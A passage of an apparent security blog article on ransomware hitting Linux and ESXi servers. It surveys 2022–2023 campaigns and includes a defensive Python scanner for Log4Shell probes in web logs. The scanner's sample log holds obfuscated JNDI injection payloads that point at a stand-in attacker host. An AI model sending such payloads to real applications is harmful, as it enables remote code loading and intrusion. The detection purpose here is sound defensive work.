Attacks on virtualization systems and Linux servers

Linux and ESXi-based systems are increasingly falling victim to ransomware attacks. So how can you protect your servers?

What methods are used to attack servers, and how to guard against ransomware

Ransomware. Nasty. But how to build defenses against it? Rather – what should be protected first and foremost? Often, Windows workstations, Active Directory servers, and other Microsoft products are the prime candidates. And this approach is usually justified. But we should bear in mind that cybercriminal tactics are constantly evolving, and malicious tools are now being developed for Linux servers and virtualization systems. In 2022, the total number of attacks on Linux systems increased by about 75%.

The motivation behind such attacks is clear: open source and virtualization keep gaining popularity, which means more and more servers run Linux or VMware ESXi. These often hold large amounts of critical data (an ESXi host stores the disk files of every virtual machine running on it), so encrypting them can instantly cripple a company’s operations. And since the security of Windows systems has traditionally been the focus of attention, non-Windows servers are proving to be sitting ducks.

Attacks in 2022–2023

  • In February 2023, many owners of VMware ESXi servers were hit by the ESXiArgs ransomware. Exploiting CVE-2021-21974 (a heap overflow in the ESXi OpenSLP service that VMware had patched back in February 2021), attackers shut down virtual machines and encrypted their .vmxf, .vmx, .vmdk, .vmsd and .nvram files.
  • The infamous Clop gang — noted for a large-scale attack on vulnerable Fortra GoAnywhere file-transfer services through CVE-2023-0669 — was spotted in December 2022 using, albeit to a limited extent, a Linux version of its ransomware. It differs significantly from its Windows counterpart (lacking some optimizations and defensive tricks), but is adapted to Linux permissions and user types and specifically targets Oracle database folders.
  • A new version of the BlackBasta ransomware is built specifically for attacks on ESXi hypervisors. It encrypts with the ChaCha20 algorithm across multiple threads running on multiple processor cores; since ESXi hosts are typically multiprocessor, this parallelism minimizes the time needed to encrypt the entire environment.
  • Shortly before its breakup, the Conti group also armed itself with ESXi-targeting ransomware. Unfortunately, since much of Conti’s code was leaked, its developments are now available to a broad range of cybercriminals.
  • The BlackCat ransomware, written in Rust, is also capable of disabling and deleting ESXi virtual machines. In other respects, the malicious code differs little from the Windows version.
  • The Luna ransomware, which we detected in 2022, was cross-platform from the outset, able to run on Windows, Linux and ESXi systems. And, of course, the LockBit group could hardly ignore the trend: it too began offering ESXi versions of its malware to affiliates.
  • As for older (but, alas, still effective) attacks, there were also the RansomEXX and QNAPCrypt campaigns, which hit Linux servers hard.

Server-attack tactics

Initial access to Linux servers usually comes from exploiting vulnerabilities. Attackers can weaponize flaws in the operating system, web servers and other base components, as well as in business applications, databases and virtualization platforms. As Log4Shell (CVE-2021-44228) demonstrated, vulnerabilities in open-source components deserve special attention: a single library can be embedded in a great many products, each of which needs its own patch, and the exploit payload can arrive in any field the application happens to log. After the initial breach, many ransomware strains use additional tricks or vulnerabilities to elevate privileges before encrypting the system.
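Because a Log4Shell payload can hide in any logged field (a User-Agent header, a query parameter, a username), and attackers nest Log4j lookups such as ${lower:j} or ${::-j} to evade naive grep rules for "jndi:", a practical first check is to normalize web-server logs the way Log4j itself would before matching. The following Python scanner is an added example written for this page, not code from the article or from Kaspersky; the access-log lines, IP addresses and callback hosts in it are constructed for illustration.

```python
import re
import urllib.parse

# Constructed sample access-log lines in Apache/nginx "combined" format.
# Addresses and payloads are made up for this example, not taken from the article.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2021:10:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"
203.0.113.8 - - [10/Dec/2021:10:00:09 +0000] "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.9%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"
203.0.113.9 - - [10/Dec/2021:10:00:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.9/x}"
203.0.113.10 - - [10/Dec/2021:10:00:15 +0000] "GET /price?amount=${total} HTTP/1.1" 200 50 "-" "Mozilla/5.0"
"""

# An innermost Log4j lookup: "${...}" whose body contains no further braces.
LOOKUP = re.compile(r"\$\{([^{}]*)\}")


def percent_decode(text, max_layers=3):
    """Undo URL-encoding, possibly applied more than once, until the text is stable."""
    for _ in range(max_layers):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def resolve_lookups(text, max_rounds=64):
    """Collapse the nested-lookup tricks used to hide the string 'jndi:'.

    Innermost lookups are rewritten first, the order in which Log4j 2 evaluates them:
      ${lower:J} / ${upper:j}   -> the argument (our match is case-insensitive anyway)
      ${env:NOPE:-j} / ${::-j}  -> the default value after ':-'
      ${anything-else}          -> its body, so an unrelated lookup cannot loop forever
    Returns (normalized_text, jndi_lookup_or_None). The round limit bounds the work
    an attacker can force with deeply nested input.
    """
    for _ in range(max_rounds):
        m = LOOKUP.search(text)
        if not m:
            return text, None
        body = m.group(1)
        if body.lower().startswith("jndi:"):
            return text, m.group(0)
        if ":-" in body:
            repl = body.split(":-", 1)[1]
        elif body.lower().startswith(("lower:", "upper:")):
            repl = body.split(":", 1)[1]
        else:
            repl = body
        text = text[:m.start()] + repl + text[m.end():]
    return text, None


def scan_log(log_text):
    """Return (line_number, client_ip, resolved_lookup) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        _, lookup = resolve_lookups(percent_decode(line))
        if lookup:
            hits.append((n, line.split(" ", 1)[0], lookup))
    return hits


if __name__ == "__main__":
    for n, ip, lookup in scan_log(SAMPLE_LOG):
        print(f"line {n}: {ip} sent {lookup}")
```

Run against the sample, the scanner flags lines 2, 3 and 4 and reports the de-obfuscated lookup for each, while the legitimate-looking `${total}` on line 5 is not reported. A hit proves only that a probe arrived, not that it succeeded; the confirming evidence is an outbound LDAP or RMI connection from the application host to the address in the lookup.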

Priority safeguards for Linux servers

To minimize the chances of attacks affecting Linux servers, we recommend: